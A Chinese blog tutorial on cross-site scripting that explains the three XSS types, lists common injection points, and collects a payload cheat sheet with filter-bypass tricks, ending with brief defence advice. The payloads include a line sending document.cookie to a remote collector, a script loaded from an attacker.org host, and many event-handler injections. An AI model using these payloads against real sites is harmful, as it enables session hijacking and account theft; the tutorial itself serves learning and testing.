xss漏洞原理应用及常用payload总结

最新推荐文章于 2024-05-11 21:35:53 发布
最新推荐文章于 2024-05-11 21:35:53 发布
阅读量6.1k 收藏 39
点赞数 5
分类专栏: xss 文章标签: xss javascript 信息安全 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ldzhhh/article/details/106346169
版权

xss简介

XSS攻击全称跨站脚本攻击(Cross Site Scripting),但为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。一般只要有用户输入的地方,就可能会出现XSS漏洞。

可能造成的危害

  • 网站弹框(刷流量)
  • 网站挂马
  • 会话劫持
  • 控制目标数据
  • Cookie被盗取
  • 用户提权
  • 账号被盗
  • 强制发送电子邮件
  • 尽量DDOS
  • 蠕虫攻击等

xss分类

  • 反射型XSS
  • 存储型XSS
  • DOM型XSS

三种类型比较:
在这里插入图片描述

攻击原理

反射型xss攻击原理
反射型XSS又称非持久型XSS,攻击方式仅具有一次性。反射型XSS只是简单地把用户输入的数据“反射”给浏览器。也就是说,黑客往往需要诱使用户“点击”一个恶意链接,才能攻击成功。
在这里插入图片描述

存储型xss攻击原理
存储型XSS会把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。比较常见的一个场景就是,黑客写下一篇包含有恶意JavaScript代码的博客文章,文章发表后,所有访问该博客文章的用户,都会在他们的浏览器中执行这段恶意的JavaScript代码。每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie
在这里插入图片描述

DOM型xss攻击原理
基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。
在这里插入图片描述

漏洞利用

1.盗取cookie:<script>alert(document.cookie)</script>
2.构造页面跳转:<script>location='https://www.hacker.com'</script>
3.构造获取cookie并发送到远程主机:

<script>document.location='http://127.0.0.1/test/cookie.phpcookie='+document.cookie</script>

常见注入点

  • 输入框
  • 留言板
  • URL中可传参数的变量

常用Payload

Script标签:

<script>alert(/1/)</script>
<script>prompt(1)</script> 
<script>confirm(1)</script>
<script src="http://attacker.org/malicious.js"></script>
<script src=data:text/javascript,alert(1)></script>
<script>setTimeout(alert(1),0)</script>

Img标签:

<img src=x onerror=alert(1)>
<img src=x onerror=prompt(1);>
<img src=javascript:alert('1')>

a标签:

<a href=”javascript:alert(1)>点击触发</a>
<a href="http://www.hacker.com">点击触发</a>

Iframe标签:

<iframe src="javascript:alert(1)">
<iframe onload=alert(1)>

其他标签:

<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>

常用事件:
onclick: 点击触发 (<img src=x onclick=alert(1)>)
onerror: 当 src 加载不出来时触发 (<img src=x onerror=alert(1)>)
onload: 当 src 加载完毕触发(<img src=x onload=alert(1)>)
onmouseover:鼠标指针移动到图片后触发(<img src=x onmouseover=alert(1)>)
onmousemove: 鼠标指针移到指定的元素后触发(<img src=x onmousemove=alert(1) >)
onfocus: 当 input 输入框获取焦点时触发(<input onfocus=javascript:alert(1) autofocus>)

常用属性:
src
action
href
data
content

javascript弹窗函数:
alert()
confirm()
prompt()

常用绕过方法

1.大小写绕过(<SCRIPT>)
2.双写绕过(<SCr<scRiPT>ipt>)
3.关键字HTML编码绕过
4.任意位置插入null字符(<im[%00]g onerror=alert(xss) src=a>)
5.JavaScript转义(<script>eval(‘a\154ert(1)’)</script>)

Xss漏洞的防范

不信任任何用户的输入,对每个用户的输入都做严格检查,过滤,在输出的时候,对某些特殊字符进行转义,替换等

见痴
关注
  • 5
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS与靶场(史上最详细附带payload)
qq_34598847的博客
10-17 2684
Cookie 和 Session都是用来跟踪浏览器用户身份的会话方式,但是两者的应用场景不太一样。Cookie 一般用来保存用户信息 比如①我们在 Cookie 中保存已经登录过得用户信息,下次访问网站的时候页面可以自动帮你填写登录的一些基本信息;②一般的网站都会有保持登录也就是说下次你再访问网站的时候就不需要重新登录了,这是因为用户登录的时候我们可以存放了一个 Token 在 Cookie 中,下次登录的时候只需要根据 Token 值来查找用户即可(为了安全考虑,重新登录一般要将 Token 重写)
【网络安全】Web安全系列——XSS攻击
fly_enum的博客
08-18 697
跨站脚本攻击(XSS),英文全称 Cross Site Script, 是Web安全头号大敌。XSS攻击,一般是指黑客通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式。其中,XSS攻击通常分为反射XSS存储XSS、DOM Based XSS三种。可以通过以下例子看看XSS攻击是如何产生的。
2024年网络安全最全【XSS平台】使用,简单 payload 项目的创建(1),分享一点面试小经验
最新发布
2401_84301948的博客
05-11 646
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
xss常用Payload总结
csd_ct的专栏
01-03 1万+
xss常用Payload总结 渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用xss注入的姿势 1.img 注入 快速探测是否存在xss 1) <img src='x' onerror='alert(1)'> 2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))"> 2.iframe 注入 后台做了相
XSS漏洞详解 一文了解XSS漏洞和常见payload
闵行小鱼塘
10-11 4136
刷完了XSS challenge和XSS game,对XSS漏洞有了些许认识,在此做个小结与记录
终极万能XSS Payload
None安全团队
03-10 6110
前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload。就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS payload: 这里对它的定义就是 可以适应各种场景进行js代码执行的 payload,只需要有这一条payload即可(例如闭合html 闭合js) 下面我们来看看 payload长什么样子: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=al...
Web的基本漏洞--XSS漏洞
尽欢的博客
05-31 3347
XSS漏洞介绍、XSS漏洞的攻击方式--注入脚本代码
XSS漏洞 DOM测试 payload代码
02-26
XSS漏洞 DOM测试 payload代码 这是测试跨脚本攻击是否有DOMXSS漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
Web应用进行XSS漏洞测试
03-03
对WEB应用进行XSS漏洞测试,不能仅仅局限于在WEB页面输入XSS攻击字段,然后提交。绕过JavaScript的检测,输入XSS脚本,通常被测试人员忽略。下图为XSS恶意输入绕过JavaScript检测的攻击路径。XSS输入通常包含...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
xss绕过,payload全集
热门推荐
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射xss,DOMXSS存储XSS,不同类XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
3.2.1初探XSS Payload
wojiushilsy的博客
06-26 693
XSS 攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些用以完成各种具体功能的恶意脚本,被称为"XSS Payload"。 XSS Payload实际上就是JavaScript脚本(还可以是Flash或其他富客户端的脚本),所以任何JavaScript脚本能实现的功能,XSS Payload都能做到。 一个最常见的XSS Payload,就是通过读取浏览器对象,从而发起“Cookie劫持”攻击。 Cookie中一般加密保存了当前用户的登录凭证。Cookie如果丢失
Web安全系列(三):XSS 攻击进阶(挖掘漏洞
weixin_33950035的博客
09-18 412
前言 在前些章节 (web安全系列(一):XSS 攻击基础及原理)以及(Web安全系列(二):XSS 攻击进阶(初探 XSS Payload))中,我详细介绍了 XSS 形成的原理以及 XSS 攻击的分类,并且编写了一个小栗子来展示出 XSS Payload 的危害。 目前来说,XSS漏洞主要分为三类:反射存储、DOM,在本篇文章当中会以permeate生态测试系统为例,分析网站功...
XSS注入——反射性XSS
wwwwyyyrre的博客
06-15 2361
所以就可以利用这个函数来构造payload,也是最简单的xss脚本语言:这样就可以绕过了 没有任何的限制 就是一个简单的反射xss注入等明天搭一个本地的靶场来做xss-labs我认为不是很难,反射xss
XSSpayload 常用构造和变形方法
吉吉的博客
03-06 1775
XSS 相关 payload 构造和变形的常用方法。
28、XSS常见payload
weixin_41489908的博客
01-02 5521
环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签: "> 或者 "οnmοuseοve...
XSS常用Payload
z2560088的博客
01-11 9789
1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过 ' onclick ='javascript:alert(1)'// " onclick ='javascript:alert(1)'// 3.<> script onclick被过滤,用a标签绕过 "></input><
XSS漏洞及其原理(详解)
刘桂香263的博客
07-29 1万+
XSS被称为跨站脚本攻击(CrossSiteScripting),由于和层叠样式表(CascadingStyleSheets,CSS)重名,改为XSS。主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。
xss漏洞原理及挖掘方法
05-12
XSS(Cross-site scripting)跨站脚本攻击,是一种常见的Web攻击方式,攻击者通过在网页中注入恶意脚本代码,使得用户在浏览网页时执行这些脚本代码,达到攻击的目的。 XSS攻击的原理是,攻击者在网页中注入恶意脚本代码,当用户访问这个网页时,恶意脚本代码会被执行,从而达到攻击的目的。攻击者可以通过XSS攻击来窃取用户的敏感信息、绕过网站的访问控制、劫持用户会话、篡改网页内容等。 XSS漏洞的挖掘方法一般包括以下几个步骤: 1. 扫描目标网站:使用一些扫描工具,如Burp Suite、OWASP ZAP等,对目标网站进行扫描,找出可能存在的XSS漏洞。 2. 注入恶意脚本代码:在目标网站的输入框中注入恶意脚本代码,如<script>alert("XSS漏洞");</script>,并提交表单。 3. 检查注入的恶意脚本代码是否生效:在提交表单后,在网页中查看是否弹出了XSS漏洞的测试弹窗。如果弹出了,说明注入的恶意脚本代码生效了,存在XSS漏洞。 4. 利用XSS漏洞:如果发现了XSS漏洞,攻击者可以利用这个漏洞来进行攻击,如窃取用户的敏感信息、绕过网站的访问控制、劫持用户会话、篡改网页内容等。 为了防止XSS漏洞的产生,网站开发人员可以采取以下措施: 1. 对用户输入的数据进行过滤和转义,将特殊字符进行转义,如<、>、&等。 2. 在Cookie中设置HttpOnly属性,禁止JavaScript访问Cookie,防止攻击者通过XSS攻击窃取用户的Cookie信息。 3. 在HTTP响应头中设置X-XSS-Protection属性,开启浏览器的XSS保护功能。 4. 对网站进行安全审计,定期检查网站是否存在XSS漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值